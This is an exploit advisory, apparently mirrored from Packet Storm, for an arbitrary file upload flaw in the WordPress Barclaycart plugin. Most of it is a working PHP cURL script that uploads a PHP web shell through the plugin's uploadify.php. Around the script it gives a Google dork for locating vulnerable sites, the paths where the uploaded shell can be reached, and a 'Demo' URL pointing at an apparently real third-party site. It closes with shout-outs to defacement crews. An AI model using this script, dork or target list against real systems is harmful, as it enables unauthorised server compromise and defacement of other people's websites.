Lucene search
K

WordPress Barclaycart Shell Upload

🗓️ 05 Mar 2014 00:00:00Reported by eX-Sh1NeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

WordPress Barclaycart Plugins Arbitrary File Upload vulnerability with shell upload option, exploited using a PHP script through uploadify.ph

Code
`  
WordPress Barclaycart Plugins Arbitrary File Upload  
  
######################################################################################  
# Author : eX-Sh1Ne  
#  
# Facebook : www.fb.me/ShiNe.gov  
#  
# Google Dork => inurl:"wp-content/plugins/barclaycart"  
#  
#######################################################################################  
  
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php  
  
Exploit :  
  
<?php  
$uploadfile="Sh1Ne.php";  
$ch =  
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile",   
'folder'=>'/wp-content/plugins/barclaycart/uploadify/'));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";   
?>  
  
-------------------------------------------------------------------------------------  
Shell Access :   
  
http://localhost/wp-content/plugins/barclaycart/uploadify/Sh1Ne.php  
or  
http://localhost/wp-content/uploads/[years]/[month]/ << Find your shell  
-------------------------------------------------------------------------------------  
  
Demo :  
https://www.rpgrouponline.com/wp-content/plugins/barclaycart/uploadify/uploadify.php  
  
-------------------------------------------------------------------------------------  
  
sh00tz :   
[+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat  
[+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya  
[+] Mr. Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - [+] K4C3 Undetected - Gastr0 [ Exploit4Arab.Net ]  
  
[ NOTE ]  
  
[+] Java Defacer Team still r0x !  
  
\!/ INDONESIAN PEOPLE HERE \!/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation